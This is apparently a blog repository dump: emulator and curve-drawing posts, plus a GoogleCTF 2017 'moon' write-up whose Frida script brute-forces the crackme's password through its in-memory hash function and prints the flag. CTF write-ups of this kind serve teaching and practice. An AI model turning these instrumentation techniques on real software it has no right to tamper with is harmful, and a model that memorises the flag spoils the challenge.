Question: Assuming the chain reaction has already started and is inevitable, why don't we burn the methane deposits under the siberian permafrost? 22 | 1. https://en.wikipedia.org/wiki/Clathrate_gun_hypothesis 23 | 2. https://www3.epa.gov/climatechange/ghgemissions/gases/ch4.html 24 | -------------------------------------------------------------------------------- /posts/2016-08-22-observations/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | Observations 8 | 9 | 10 | 11 | 51 | 52 | 53 |
54 | 61 | < Other articles 62 |
63 |
64 |

Observations

65 |

66 | AuthorAlexandro Sanchez 69 | Date2016-08-22 72 |

73 |

Random observations, questions, and interesting facts that caught my attention. If you can expand or answer any of these, please feel free to contact me.

74 |

Light

75 | 86 |

Climate

87 | 94 |
95 |
96 | 102 | 103 | 104 | -------------------------------------------------------------------------------- /posts/2016-09-14-jit-compiled-maps/_main.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | date: 2016-09-07 4 | title: Fast lookups in JIT-compiled maps 5 | author: Alexandro Sanchez 6 | --- 7 | 8 | This post shows a way of optimizing lookup performance in maps associating integer keys to arbitrary data. 9 | 10 | ## Background 11 | 12 | Some time ago, I reimplemented the [RSX GPU](https://en.wikipedia.org/wiki/RSX_%27Reality_Synthesizer%27) command processor in the emulator, [Nucleus](https://github.com/AlexAltea/nucleus). This GPU is made of several engines, each bound at a specific index (*0*-*7*) of the command processor, and each index provides a MMIO register window (*0x0*-*0x1FFC*). Commands are 16-bit bitfields containing an index (3-bit) and MMIO offset (13-bit). Since recent userland drivers always bound engines to the same indices and there was a limited number of valid MMIO offsets, our command processor was just a big hardcoded *switch-case* mapping commands to the corresponding emulator function. 13 | 14 | However, older or custom drivers might bind engines at different indices making our compile-time *switch-case* useless. Ignoring wasted memory, a static array of 2^16 entries could be a fast solution. Nevertheless, 32-bit or 64-bit commands could have made this impossible. Since lookup times are critical, this raises the question, **what's the fastest way of doing a lookup in a set of sparse commands -or sparse non-random integers- generated at runtime?** Should we use huge static arrays? Should we use hash tables? Which data structure will optimize lookup time? 15 | 16 | Jitter solves this by letting the compiler decide that.
17 | 18 | --- 19 | 20 | __TODO: More information soon.__ 21 | -------------------------------------------------------------------------------- /posts/2016-09-14-jit-compiled-maps/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | Fast lookups in JIT-compiled maps 8 | 9 | 10 | 11 | 51 | 52 | 53 |
54 | 61 | < Other articles 62 |
63 |
64 |

Fast lookups in JIT-compiled maps

65 |

66 | AuthorAlexandro Sanchez 69 | Date2016-09-07 72 |

73 |

This post shows a way of optimizing lookup performance in maps associating integer keys to arbitrary data.

74 |

Background

75 |

Some time ago, I reimplemented the RSX GPU command processor in the emulator, Nucleus. This GPU is made of several engines, each bound at a specific index (0-7) of the command processor, and each index provides a MMIO register window (0x0-0x1FFC). Commands are 16-bit bitfields containing an index (3-bit) and MMIO offset (13-bit). Since recent userland drivers always bound engines to the same indices and there was a limited number of valid MMIO offsets, our command processor was just a big hardcoded switch-case mapping commands to the corresponding emulator function.

76 |

However, older or custom drivers might bind engines at different indices making our compile-time switch-case useless. Ignoring wasted memory, a static array of 2^16 entries could be a fast solution. Nevertheless, 32-bit or 64-bit commands could have made this impossible. Since lookup times are critical, this raises the question, what's the fastest way of doing a lookup in a set of sparse commands -or sparse non-random integers- generated at runtime? Should we use huge static arrays? Should we use hash tables? Which data structure will optimize lookup time?

77 |

Jitter solves this by letting the compiler decide that.

78 |
79 |

TODO: More information soon.

80 |
81 |
82 | 88 | 89 | 90 | -------------------------------------------------------------------------------- /posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3c_hilbert.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3c_hilbert.png -------------------------------------------------------------------------------- /posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3c_hilbert.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | from PIL import Image, ImageDraw, ImageColor 3 | 4 | sz = 256 # Image size 5 | mg = 32 # Image magnification (line segment size) 6 | width = 3 # Line width 7 | 8 | # Utility function for mapping list of colors names 9 | def get_colors(colors, mode='RGB'): 10 | if colors is None: 11 | colors = 'black' 12 | return list(map(lambda x: ImageColor.getcolor(x, mode), colors.split(','))) 13 | 14 | def popcount(x): 15 | n = 0 16 | while x: 17 | n += 1 18 | x &= (x - 1) # Clear the bottom-most set bit - cf snippet 0x2f 19 | return n 20 | 21 | def hilbert_direction(idx): 22 | aa = 0xaa 23 | aa |= aa << 8 24 | aa |= aa << 16 25 | aa |= aa << 32 26 | r = popcount(idx & (idx & aa) >> 1) & 1 27 | s = popcount(-idx & (-idx & aa) >> 1) & 1 28 | return 1 - r - s, r - s 29 | 30 | def draw_hilbert(n, mg, width=1, colors=None, mode='RGB'): 31 | # how much to shift lines by 32 | e = width >> 1 33 | # Calculate canvas size 34 | sz = mg * ((1 << n) - 1) + width 35 | pos = (e, e) 36 | img = Image.new(mode, (sz, sz), get_colors('white', mode)[0]) 37 | draw = ImageDraw.Draw(img) 38 | colors = get_colors(colors, mode) 39 | for i in range(1, 1 << (n << 1)): 40 | dx, dy = hilbert_direction(i) 41 | npos = (pos[0] + mg * dx, pos[1] - mg * dy) 42 | line = [ pos, npos ] 43 | draw.line(line, fill=colors[(i - 1) % len(colors)], width=width) 
44 | pos = npos 45 | return img 46 | 47 | img = draw_hilbert(5, mg=16, colors='blue,red',width=7) 48 | img.show() 49 | img.save('xorpd_0x3c_hilbert.png', optimize=True, dpi=(150, 150)) 50 | -------------------------------------------------------------------------------- /posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3d_morton.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3d_morton.png -------------------------------------------------------------------------------- /posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3d_morton.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | from PIL import Image, ImageDraw, ImageColor 3 | 4 | n = 5 # Generation number 5 | mg = 32 # Image magnification (line segment size) 6 | width = 3 # Line width 7 | 8 | def morton(n): 9 | pos = [ 0, 0 ] 10 | yield tuple(pos) 11 | for i in range(1, 1 << (2 * n)): 12 | k = 1 13 | while True: 14 | pos[0] ^= k 15 | k &= ~pos[0] 16 | if not k: 17 | break 18 | pos[1] ^= k 19 | k &= ~pos[1] 20 | if not k: 21 | break 22 | k <<= 1 23 | yield tuple(pos) 24 | 25 | def disinterleave(z): 26 | x = 0 27 | y = 0 28 | k = 0 29 | while z: 30 | x |= (z & 1) << k 31 | y |= (z & 2) << k 32 | z >>= 2 33 | k += 1 34 | y >>= 1 35 | return x, y 36 | 37 | def interleave(x, y): 38 | z = 0 39 | y <<= 1 40 | k = 0 41 | while x or y: 42 | z |= ((x & 1) | (y & 2)) << k 43 | x >>= 1 44 | y >>= 1 45 | k += 2 46 | return z 47 | 48 | def morton2(n): 49 | for i in range(1 << (2 * n)): 50 | yield disinterleave(i) 51 | 52 | def scale_point(pt, corner, mg): 53 | return corner[0] + pt[0] * mg, corner[1] + pt[1] * mg 54 | 55 | def draw_morton(n, mg, width, color='black'): 56 | sz = width + mg * ((1 << n) - 1) 57 | img = Image.new('RGB', (sz, sz), ImageColor.getcolor('white', 'RGB')) 
58 | draw = ImageDraw.Draw(img) 59 | gen = morton(n) 60 | corner = (width >> 1, width >> 1) 61 | scaler = lambda x: scale_point(x, corner, mg) 62 | pos = next(gen) 63 | for npos in gen: 64 | draw.line(list(map(scaler, [ pos, npos ])), fill=ImageColor.getcolor(color, img.mode), width=width) 65 | pos = npos 66 | return img 67 | 68 | img = draw_morton(5, mg=16, color='black', width=1) 69 | img.show() 70 | img.save('xorpd_0x3d_morton.png', optimize=True, dpi=(150, 150)) 71 | -------------------------------------------------------------------------------- /posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3f_hanoi.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3f_hanoi.png -------------------------------------------------------------------------------- /posts/2017-07-19-googlectf-2017-moon/_main.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | date: 2017-06-19 4 | title: GoogleCTF 2017 Reversing/Moon writeup 5 | author: Alexandro Sanchez 6 | --- 7 | 8 | Last weekend I participated on the [Google CTF 2017](https://capturetheflag.withgoogle.com/) as part of the glorious team "*63 7c 77 7b f2 6b 6f c5 30 01 67 2b fe d7 ab 76*" composed of [AlexF0rtune](https://twitter.com/AlexF0rtune) and me. Among the many tough and fun challenges that we attempted, and the few ones that we actually solved, *moon* was certainly the most entertaining one for me, so I decided to prepare a writeup of my solution. 9 | 10 | The problem simply states: 11 | 12 | > What's the password? 13 | > [moon.zip](moon.zip) 14 | 15 | 16 | ## Static analysis 17 | 18 | After extracting the ZIP file, we see our target is a Win32 executable, using OpenGL to render a simple UI asking for a password of length 32. For wrong passwords it will display the message: "*Nope*". 
19 | 20 | As usual with this kind of challenge, one would start by looking for occurrences of this string within the executable, and find code referencing said string. Opening the executable with [IDA Pro](https://www.hex-rays.com/products/ida/) and searching for strings containing `Nope` we find the string `____NopeGood` referenced in `sub_402660`. Decompiling and slightly formatting the relevant code results in: 21 | 22 | ```cpp 23 | // const char aNopegood[] = " NopeGood"; 24 | v12 = dword_4CA0AC; 25 | v15 = 4 * v12; 26 | v16 = (unsigned __int8)aNopegood[v15]; 27 | ``` 28 | 29 | The value `dword_4CA0AC` acts as an index into the aforementioned string. If we want to succeed (i.e. obtain `Good`) we need its value to be 2. If we search for places where the value at `4CA0AC` is set to 2 we obtain the following occurrence in the function `sub_498A10`: 30 | 31 | ![](ida.png) 32 | 33 | In order to pass the test, both buffers passed to `memcmp` have to match. 34 | 35 | 36 | ## Dynamic analysis 37 | 38 | To simplify the process of reversing, we used [x64dbg](http://x64dbg.com/) to quickly debug and inspect the memory of the program while it's running. 39 | 40 | These buffers each seem to contain 512 bytes of what looks like the hexadecimal representation of a hash. The contents pointed by `rcx` change every time the password is modified (*computed hash string*). The contents pointed by `rdx` are constant (*expected hash string*) and its first bytes are: 41 | 42 | ``` 43 | 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF 44 | 0000000000F86BD0 33 30 63 37 65 61 64 39 37 31 30 37 37 37 35 39 30c7ead971077759 45 | 0000000000F86BE0 36 39 62 65 34 62 61 30 30 63 66 35 35 37 38 66 69be4ba00cf5578f 46 | ... 47 | ``` 48 | 49 | After reversing `sub_498A10`, we realize that the *computed buffer* is generated by converting each integer from a buffer `uint32_t hash[64]` (i.e. length 0x100) into a hexadecimal string via `%.8x` (see `sub_4016D0`).
Concatenating all these hexadecimal strings results in the aforementioned hexadecimal string. Relevant code: 50 | 51 | ```cpp 52 | v14 = (__int128 *)&v41; 53 | // ... 54 | if ((unsigned __int8)sub_401BF0(qword_4CA080, (unsigned __int64)&v41)) { 55 | do { 56 | v15 = *(_DWORD *)v14; 57 | v28 = 0i64; 58 | v29 = 0; 59 | sub_4016D0(&v28, "%.8x", v15); 60 | v16 = (char *)&v28 + strlen((const char *)&v28); 61 | if ( v16 - (char *)&v28 > 0x7FFFFFFFFFFFFFFFi64 - Size ) 62 | sub_4921C0("basic_string::append"); 63 | sub_486EE0(&Memory, &v28, v16 - (char *)&v28); 64 | v14 = (__int128 *)((char *)v14 + 4); 65 | } 66 | // ... 67 | } 68 | ``` 69 | 70 | This buffer pointed by `v41` contains the raw bytes of the hash. This hash is updated by the function `sub_401BF0(const char* password, char* hash)` every time the user-supplied password reaches 32 characters in length. 71 | 72 | Brief pause: 73 | > As you see, instead of reverse engineering entire functions and then making sense of the code, our approach could be described as doing inverse data-tainting manually and reverse engineering only the necessary bits along the way. 74 | 75 | Inside `sub_401BF0` we attempted to locate where the data copied to the hash pointer `v41` was coming from. It was being copied from another buffer at address `0000000007478000` (in that particular execution) which looked "quite suspicious" due to the following reasons: 76 | 77 | 1. Hardware breakpoints on memory accesses were not working. 78 | 2. This buffer was filled right after calling functions from my GPU driver libraries (in my case `ig9icd64.dll`), most likely just its OpenGL implementation. 79 | 80 | ``` 81 | 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF 82 | 0000000007478000 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 ................ 83 | 0000000007478010 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 ................ 84 | ...
85 | 0000000007478100 E3 5C A9 DE C6 42 8F 29 61 7C A1 5C 44 62 87 AB ã\©ÞÆB.)a|¡\Db.« 86 | 0000000007478110 E7 1D B9 DA C2 03 9F 2D 65 3D B1 58 40 23 97 AF ç.¹ÚÂ..-e=±X@#.¯ 87 | ... 88 | ``` 89 | 90 | We suspect GPGPU is coming into play and that compute shaders might be responsible for generating the hash. 91 | 92 | 93 | ## Extracting compute shaders 94 | 95 | Looking at the strings in the executable, it's clear that no compute shader is visible as plaintext. However, rather than inspecting which of the many functions is responsible of decrypting the GLSL source, or trying to locate it somewhere within the user address space. We fetch it from where the application could never hide it: the GPU driver libraries. 96 | 97 | For that purpose we use [Apitrace](http://apitrace.github.io/). We spawn *moon.exe* with it, in *OpenGL* mode, fill out a dummy password, close the application and proceed to inspect the list of captured frames. From the long list of frames, most with 1027 calls, we notice one with 1041 calls. As expected, the small difference here is that the application maps shader storage buffer and fills it with `GL_COMPUTE_SHADER` data. 98 | 99 | ![](apitrace.png) 100 | 101 | Apitrace provides us the application-supplied source code for the mapped shader, which we auto-formatted for readability reasons. You can read the entire GLSL source code at: [moon.glsl](moon.glsl). 102 | 103 | Next, we will discuss the most important parts of the shader. Firstly, we observed the following input/output buffers: 104 | 105 | ```glsl 106 | layout(std430, binding = 0) buffer shaderExchangeProtocol { 107 | uint state[64]; 108 | uint hash[64]; 109 | uint password[32]; 110 | }; 111 | ``` 112 | 113 | The meaning of `password` is clear from the context. Inspecting the GLSL code we notice that every invocation of the shader results in a `uint32_t` value being updated in `hash[idx]`. Similarly, the value `state[idx]` changes from 1 to 2 to mark that particular task as finished. 
114 | 115 | ```glsl 116 | if ((idx & 1) == 0) { 117 | final = hash_alpha(password[idx / 2]); 118 | } else { 119 | final = hash_beta(password[idx / 2]); 120 | } 121 | ``` 122 | 123 | For every character in `password`, two different hashes are computed, `hash_alpha` and `hash_beta`, each resulting in a `uint32_t` value that is stored in the `hash` buffer after XOR'ing it further. More details on these operations will be given in the following paragraphs. 124 | 125 | Our goal now is to recover the password from the expected hash. Here we noticed two possible approaches, a quick one (which we used in the CTF), and a more elegant one (for the sake of perfectionism and pleasing mathematicians). 126 | 127 | 128 | ## Strategy #1: The Hacker's Approach 129 | 130 | Every invocation of the compute shader takes into account a **single character** of the password in order to generate a `uint32_t` value of the hash, except for the final part that iterates over the whole password: 131 | 132 | ```glsl 133 | uint h = 0x5a; 134 | for (i = 0; i < 32; i++) { 135 | uint p = password[i]; 136 | uint r = (i * 3) & 7; 137 | p = (p << r) | (p >> (8 - r)); 138 | p &= 0xff; 139 | h ^= p; 140 | } 141 | final ^= (h | (h << 8) | (h << 16) | (h << 24)); 142 | ``` 143 | 144 | However, since `p` is always masked with 0xFF, `h` will be in range [0x00, 0xFF]. Thus, there are only 256 possible values with which the `final` variable could be XOR'ed (e.g. `01010101`, `02020202`, etc.). This can be bruteforced by iterating over every possible value of `h`. 145 | 146 | * __Bruteforcing algorithm__: For every position `i` in the password, we try character `c` and temporarily set `password[i] = c`. We calculate the first of the two resulting `uint32_t` hash values (we don't need the second one!) and, as described before, we XOR the result with each of the 256 possible values with which `final` could be XOR'ed. If there's a match, we keep the character `c` and move on with the next `i`.
147 | 148 | Considering a 32-byte password and 256 choices for each `c` and `h`, we get the following worst case scenario: 32 * 256 * 256 = 2097152 attempts. 149 | 150 | We could reimplement the whole algorithm again, which would certainly save computing time. But in a CTF, it is *our* time that matters. To solve the challenge as quickly as possible, we used [Frida](https://www.frida.re/) to instrument *moon.exe*, and automatically execute the function `sub_401BF0` for arbitrary passwords. You can find the source code at [bruteforcer.py](bruteforcer.py). 151 | 152 | 153 | To explain the code briefly: We allocate the buffers that will hold both the password and hash. We will pass them as arguments to the *hashgen* function (aka. `sub_401BF0`), which is transformed into a `NativeFunction` to be invoked later on directly from our code. 154 | 155 | ```javascript 156 | // Buffers 157 | var pswd_ptr = Memory.alloc(0x20); 158 | var hash_ptr = Memory.alloc(0x400); 159 | 160 | var hashgen_ptr = new NativePointer(0x401BF0); 161 | var hashgen = new NativeFunction(hashgen_ptr, 'int', ['pointer', 'pointer']); 162 | ``` 163 | 164 | Then, for every choice of `i`, `c`, `h`, we have the following block of code (i.e. deep within three nested loops). 165 | 166 | ```javascript 167 | var maskh = to_uint32(h | (h << 8) | (h << 16) | (h << 24)); 168 | Memory.writeU8(pswd_ptr.add(i), c); 169 | hashgen(pswd_ptr, hash_ptr); 170 | var dword = Memory.readU32(hash_ptr.add(8*i)) ^ maskh; 171 | if (to_uint32(dword) == to_uint32(expected[2*i])) { 172 | valid = true; 173 | break; 174 | } 175 | ``` 176 | 177 | After around 1 minute of computing time we obtain the following output. Challenge solved! 178 | 179 | ``` 180 | CTF{OpenGLMoonMoonG0esT0TheMoon} 181 | ``` 182 | 183 | Small addendum: 184 | * Note that we didn't need to understand what `hash_alpha` and `hash_beta` were doing. We recovered the entire password just by cleverly bruteforcing over (half of!)
the expected hash buffer entries. 185 | * We are aware that `h` does not need to be bruteforced again for `i > 0` and by restricting ourselves to printable choices of `c` we could bring the worst case scenario down to: 32 * (0x7E - 0x20 + 1) + 256 = 3296 attempts (x100 speedup). However, the naive approach was fast enough for us. 186 | 187 | 188 | ## Strategy #2: The Mathematician's Approach 189 | 190 | We start by analyzing `hash_alpha` and `hash_beta`. They are identical, except that they access different indices from the vector `calc(p)`, corresponding to its components X and Y respectively. The function `calc` converts character `p`, interpreted as degrees, to radians stored in the variable `r`. Then, it computes the following: 191 | 192 | ![$$ 193 | \begin{pmatrix} 194 | \cos{r} & -\sin{r} & 0 \\ 195 | \sin{r} & \cos{r} & 0 \\ 196 | 0 & 0 & 1 \\ 197 | \end{pmatrix} 198 | \cdot 199 | \begin{pmatrix} 1024 \\ 0 \\ 0 \end{pmatrix} + 200 | \begin{pmatrix} 2048 \\ 2048 \\ 0 \end{pmatrix} 201 | $$](latex-1.png) 202 | 203 | Thus we know that the intermediate values are in range [1024, 3072] since: 204 | * *X*: `uint(calc(p)[0]) == 1024*cos(r) + 2048`. 205 | * *Y*: `uint(calc(p)[1]) == 1024*sin(r) + 2048`. 206 | 207 | Given *X* and *Y* we could compute back `p` via: 208 | 209 | ![$$ 210 | \text{degrees}(\text{atan2}(\frac{Y - 2048}{1024}, \frac{X - 2048}{1024})) 211 | $$](latex-2.png) 212 | 213 | Next, we analyze the `extend` function: 214 | 215 | ```glsl 216 | uint extend(uint e) { 217 | uint i; 218 | uint r = e ^ 0x5f208c26; 219 | for (i = 15; i < 31; i += 3) { 220 | uint f = e << i; 221 | r ^= f; 222 | } 223 | return r; 224 | } 225 | ``` 226 | 227 | The argument `e` is XOR'ed with a constant and then again with multiple copies of itself shifted by some amount. *Luckily* for us those shifts are all at least 15 bits, so the low 15 bits are left untouched, which is enough to keep our values *X*,*Y* undamaged as they are in range [1024, 3072].
228 | 229 | This concludes the `hash_alpha` and `hash_beta` functions. Next, we analyze the code modifying the `final` variable inside the `main` function. The first loop is actually a constant-ish XOR (only depends on the index, which is known), so we are able to revert this as well: 230 | 231 | ```glsl 232 | uint i; 233 | for (i = 0; i < 32; i += 6) { 234 | final ^= idx << i; 235 | } 236 | ``` 237 | 238 | For the final part, as mentioned in the previous section, we could try bruteforcing which of the 256 possible values of `h` is the correct one. However, note that undoing the previous constant XORs should have yielded the values for *X* and *Y* whose bits with index #15 to #11 should be zero (since 2048 = 2^11). This indirectly tells you those bits for `h` which slightly reduces the entropy. 239 | 240 | Putting it all together, for some `h`, the steps to recover the password character at index `i`, given corresponding hashes *A* and *B* are as follows: 241 | 1. Revert the XORs in `main` for *A* and *B*. 242 | 2. Revert the XOR in `extend` for *A* and *B*. 243 | 3. Compute `X = (A ^ 0x5F208C26) & 0x7FFF` and `Y = (B ^ 0x5F208C26) & 0x7FFF`. 244 | 4. Compute `c = deg(atan2((Y-2048)/1024, (X-2048)/1024))`. 245 | 5. Set `password[i] = c`. 246 | 247 | Once again, challenge solved! 248 | 249 | There is no code available for this approach since it's not the strategy we followed in the CTF, but we found it quite an elegant approach worthy of discussion. 
250 | -------------------------------------------------------------------------------- /posts/2017-07-19-googlectf-2017-moon/_main.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2017-07-19-googlectf-2017-moon/_main.pdf -------------------------------------------------------------------------------- /posts/2017-07-19-googlectf-2017-moon/apitrace.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2017-07-19-googlectf-2017-moon/apitrace.png -------------------------------------------------------------------------------- /posts/2017-07-19-googlectf-2017-moon/bruteforcer.py: -------------------------------------------------------------------------------- 1 | import frida 2 | import time 3 | 4 | code = """ 5 | 'use strict'; 6 | 7 | var pswd_ptr = Memory.alloc(0x20); 8 | var hash_ptr = Memory.alloc(0x400); 9 | 10 | var keygen_ptr = new NativePointer(0x401BF0); 11 | var keygen = new NativeFunction(keygen_ptr, 'int', ['pointer', 'pointer']); 12 | 13 | var expected = [ 14 | 0x30c7ead9, 0x71077759, 15 | 0x69be4ba0, 0x0cf5578f, 16 | 0x1048ab13, 0x75113631, 17 | 0xdbb6871d, 0xbe35162b, 18 | 0x1c62e982, 0xeb6a7512, 19 | 0xf3274743, 0xfb2e55c8, 20 | 0x18912779, 0xef7a3416, 21 | 0x9a838666, 0xff3994bb, 22 | 0x4d3c6e14, 0xba2d732f, 23 | 0x14414f2c, 0x1cb5d384, 24 | 0x4935aebb, 0xbe3fb206, 25 | 0x343a004e, 0x18a092da, 26 | 0xba02e3c0, 0x96987154, 27 | 0x8ed2c372, 0xeb68d1af, 28 | 0x41152cb3, 0xb61f300e, 29 | 0x3c1a8246, 0x108010d2, 30 | 0x82e16df8, 0xae7bff6c, 31 | 0xb6314d4a, 0xd38b5f97, 32 | 0x79ef2320, 0x8efe3e1b, 33 | 0x69970042, 0x9eae1fa9, 34 | 0x3c036e5d, 0xcbe87d32, 35 | 0xbe1ecfac, 0x2452ddfd, 36 | 0xc704a00e, 0xa24fbc21, 37 | 0x61b7824a, 0x968e9da1, 38 | 0xdb756712, 0xbe3e7b3d, 39 | 0x3420c8f3, 0x3c37dba4, 40 | 
0x2072a941, 0xd799ba2e, 41 | 0xebbf8619, 0x1cb59aa4, 42 | 0x9a80ebe0, 0xb61a7974, 43 | 0x1888cb62, 0x341259f6, 44 | 0x2848aad4, 0x4df2b809, 45 | 0x383e0943, 0x7928980f 46 | ]; 47 | 48 | function to_uint32(n) { 49 | return (n + 0x100000000) & 0xFFFFFFFF; 50 | } 51 | 52 | Interceptor.attach(keygen_ptr, { 53 | onEnter: function (args) { 54 | for (var i = 0; i < 0x20; i++) { 55 | console.log("Index " + i + " of 32"); 56 | for (var c = 0; c < 0x100; c++) { 57 | var valid = false; 58 | for (var h = 0; h < 0x100; h++) { 59 | var maskh = to_uint32(h | (h << 8) | (h << 16) | (h << 24)); 60 | Memory.writeU8(pswd_ptr.add(i), c); 61 | keygen(pswd_ptr, hash_ptr); 62 | var dword = Memory.readU32(hash_ptr.add(8*i)) ^ maskh; 63 | if (to_uint32(dword) == to_uint32(expected[2*i])) { 64 | valid = true; 65 | break; 66 | } 67 | } 68 | if (valid) break; 69 | } 70 | } 71 | console.log(hexdump(pswd_ptr, {length: 32})); 72 | console.log(Memory.readUtf8String(pswd_ptr, 32)); 73 | } 74 | }); 75 | """ 76 | 77 | def on_message(message, data): 78 | print(message) 79 | 80 | pid = frida.spawn(['moon/moon.exe']) 81 | frida.resume(pid) 82 | 83 | session = frida.attach(pid) 84 | script = session.create_script(code) 85 | script.on('message', on_message) 86 | script.load() 87 | -------------------------------------------------------------------------------- /posts/2017-07-19-googlectf-2017-moon/ida.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2017-07-19-googlectf-2017-moon/ida.png -------------------------------------------------------------------------------- /posts/2017-07-19-googlectf-2017-moon/latex-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2017-07-19-googlectf-2017-moon/latex-1.png 
-------------------------------------------------------------------------------- /posts/2017-07-19-googlectf-2017-moon/latex-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2017-07-19-googlectf-2017-moon/latex-2.png -------------------------------------------------------------------------------- /posts/2017-07-19-googlectf-2017-moon/moon.glsl: -------------------------------------------------------------------------------- 1 | #version 430 2 | layout(local_size_x = 8, local_size_y = 8) in ; 3 | layout(std430, binding = 0) buffer shaderExchangeProtocol { 4 | uint state[64]; 5 | uint hash[64]; 6 | uint password[32]; 7 | }; 8 | vec3 calc(uint p) { 9 | float r = radians(p); 10 | float c = cos(r); 11 | float s = sin(r); 12 | mat3 m = mat3(c, -s, 0.0, s, c, 0.0, 0.0, 0.0, 1.0); 13 | vec3 pt = vec3(1024.0, 0.0, 0.0); 14 | vec3 res = m * pt; 15 | res += vec3(2048.0, 2048.0, 0.0); 16 | return res; 17 | } 18 | uint extend(uint e) { 19 | uint i; 20 | uint r = e ^ 0x5f208c26; 21 | for (i = 15; i < 31; i += 3) { 22 | uint f = e << i; 23 | r ^= f; 24 | } 25 | return r; 26 | } 27 | uint hash_alpha(uint p) { 28 | vec3 res = calc(p); 29 | return extend(uint(res[0])); 30 | } 31 | uint hash_beta(uint p) { 32 | vec3 res = calc(p); 33 | return extend(uint(res[1])); 34 | } 35 | void main() { 36 | uint idx = gl_GlobalInvocationID.x + gl_GlobalInvocationID.y * 8; 37 | uint final; 38 | if (state[idx] != 1) { 39 | return; 40 | } 41 | if ((idx & 1) == 0) { 42 | final = hash_alpha(password[idx / 2]); 43 | } else { 44 | final = hash_beta(password[idx / 2]); 45 | } 46 | uint i; 47 | for (i = 0; i < 32; i += 6) { 48 | final ^= idx << i; 49 | } 50 | uint h = 0x5a; 51 | for (i = 0; i < 32; i++) { 52 | uint p = password[i]; 53 | uint r = (i * 3) & 7; 54 | p = (p << r) | (p >> (8 - r)); 55 | p &= 0xff; 56 | h ^= p; 57 | } 58 | final ^= (h | (h << 8) | (h << 16) | (h 
<< 24)); 59 | hash[idx] = final; 60 | state[idx] = 2; 61 | memoryBarrierShared(); 62 | } 63 | -------------------------------------------------------------------------------- /posts/2017-07-19-googlectf-2017-moon/moon.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2017-07-19-googlectf-2017-moon/moon.zip -------------------------------------------------------------------------------- /posts/2018-04-18-lle-vs-hle/_main.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | date: 2018-04-18 4 | title: LLE vs HLE and their tradeoffs 5 | author: Alexandro Sanchez 6 | --- 7 | 8 | ## Introduction 9 | 10 | This article aims to give an intuitive understanding for the terms "*Low-Level Emulation*" (LLE) and "*High-Level Emulation*" (HLE) often heard in the emulation scene, their differences and tradeoffs in development/performance costs, and how developers choose one paradigm or the other. 11 | 12 | Machines are made of several *layers of abstraction*, each of them relying in the layer below to perform some particular task. In the context of gaming consoles, you might consider these layers (ordered from higher to lower level): 13 | 14 | - Game 15 | - Game engine 16 | - System libraries 17 | - Kernel/drivers 18 | - Hardware 19 | 20 | That's where these "*low-level*" or "*high-level*" terms come from. Something is more "*high-level*" when it has more layers of abstraction below it, and it's more "*low-level*" when it has more layers of abstraction above it. With so many layers, the terms "low" and "high" can become quite subjective (developers can't even agree about whether some emulators are HLE or LLE). Furthermore, you could go even below than hardware-level and start thinking about transistors, atoms, etc. as even deeper layers of abstraction. 
Similarly, there are also even higher levels like the game scripts that are sometimes used to handle events/dialogues in a game. Of course, for most emulators, these layers are either too low, or too high. Why? 21 | 22 | ## Emulation paradigms 23 | 24 | Let's tackle this question after giving an intuitive notion of what emulation is. Emulating a system is all about putting a "*barrier*" between two adjacent layers of abstraction. For instance: 25 | 26 | - "*LLE emulators*" ([EPSXE](http://www.epsxe.com/), [PCSX2](https://pcsx2.net/)): They put the barrier between the hardware and the kernel. The entire software stack would run as usual thinking it's on a real PS1, PS2 etc., but whenever the hardware is accessed (e.g. PCI configuration registers, MMIO accesses, etc.) the emulator would intercept that and execute whatever the emudevs wanted. This is the reason why you get the original console menus and the overall "look and feel" of the console. 27 | - "*HLE emulators*" ([RPCS3](https://rpcs3.net/), [Citra](https://citra-emu.org/)): They put the barrier between the kernel and userland (i.e. applications, games, etc.). The application runs as usual (of course, after translating userland instructions), but whenever it needs to access the operating system (e.g. to open files, to map memory, to create threads), that request aka. syscall will be intercepted and handled by some code written by the emudevs. This is the reason why you can typically just drag-and-drop a game and start playing it without booting any underlying OS. 28 | 29 | Back to the original question, why do emulators pick the barriers always at these two "hot spots", i.e. LLE (hardware and kernel) and HLE (kernel and userland)? 30 | 31 | When you place this "emulation" barrier between two layers, you have to **reimplement** the layer below (i.e. 